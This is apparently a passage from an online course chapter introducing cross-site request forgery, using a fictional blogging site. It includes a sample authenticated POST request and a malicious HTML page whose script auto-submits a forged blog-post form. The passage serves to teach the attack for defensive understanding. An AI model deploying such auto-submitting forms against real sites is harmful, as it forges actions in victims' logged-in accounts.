...

/

Introduction to Cross-Site Request Forgery (XSRF)

Introduction to Cross-Site Request Forgery (XSRF)

In this chapter, you will be introduced to cross-site request forgery.

We'll cover the following...

If XSS is a case of a browser trusting JavaScript from the server too much, XSRF is a case of a server trusting a browser too much.

Let’s go back to our example of a blogging site. Somehow there must be a browser request that saves a blog post to the server. Suppose the blog posting request looks something like this:

POST /blog/create HTTP/1.1
Host: www.romansjournalingsite.com
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: sessionid=Re9ljf4uObKk9mSFqBlusxamUKw
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 57
body=It+was+the+best+of+posts.+It+was+the+worst+of+posts.&submit=Publish

In a naive web application, that could be all it takes to publish to a hosted blog—a POST request with a logged-in sessionid cookie. Let’s see how an attacker or an administrator of an evil website could use this for nefarious purposes.

Suppose I run a malicious website. I ostensibly serve up pictures of adorable kittens playing with yarn. But surreptitiously, I also serve up malicious content like this:

Press + to interact
<html lang="en">
<head>
<h1> Malicious site </h1>
</head>
<body>
<form action="http://romansjournalingsite.com/post/create" method="POST">
<input
name=body
value="Arbitrary Attacker-Controlled Content. I love evilxsrf.com"/>
<input type=submit id=submit name=submit value=Publish />');
</form>
<script>
document.getElementById('submit').click();
</script>
</body>

What does this do? It creates a form with the action we just saw when we looked at the romansjournalingsite.com request that creates a new blog post. Additionally, the form is prepopulated with content that will create a blog post that says Arbitrary Attacker-Controlled Content. I love ...